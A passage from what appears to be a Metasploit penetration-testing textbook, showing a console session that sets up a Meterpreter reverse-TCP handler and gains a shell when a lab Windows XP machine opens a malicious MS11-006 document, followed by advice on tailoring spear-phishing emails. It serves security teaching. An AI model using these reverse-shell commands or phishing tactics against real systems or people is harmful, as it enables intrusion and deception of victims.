Exploitation Using Client-Side Attacks
121
msf exploit(ms11_006_createsizeddibsection) >
use multi/handler
msf exploit(handler) >
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf exploit(handler) >
set LPORT 443
LPORT => 443
msf exploit(handler) >
exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.128:443
[*] Starting the payload handler...
msf exploit(handler) >
We open the document on a Windows XP virtual machine, and we
should be presented with a shell (provided our VM is Windows XP SP3):
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.131:2718) at
Sun Apr 03 21:39:58 -0400 2011
msf exploit(handler) >
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We have successfully exploited a file format vulnerability by creating a
malicious document through Metasploit and then sending it to our targeted
user. Looking back at this exploit, if we had performed proper reconnaissance
on our target user, we could have crafted a pretty convincing email. This exploit
is one example of a number of file format exploits available in Metasploit.
Wrapping Up
We covered how client-side exploits generally work by manipulating the heap
to work in the attacker’s favor. We covered how NOP instructions work within
an attack and how to use the basics of a debugger. You’ll learn more about
leveraging a debugger in Chapters 14 and 15. MS11-006 was a stack-based
overflow, which we will cover in depth in later chapters. Note that your suc-
cess rate with these types of attacks resides in how much information you
gain about the target before you attempt to perform the attacks.
As a penetration tester, every bit of information can be used to craft an
even better attack. In the case of spear-phishing, if you can talk the language
of the company and target your attacks against smaller business units within
the company that probably aren’t technical in nature, your chances of success
greatly increase. Browser exploits and file format exploits are typically very
effective, granted you do your homework. We’ll cover this topic in more
detail in Chapters 8 and 10.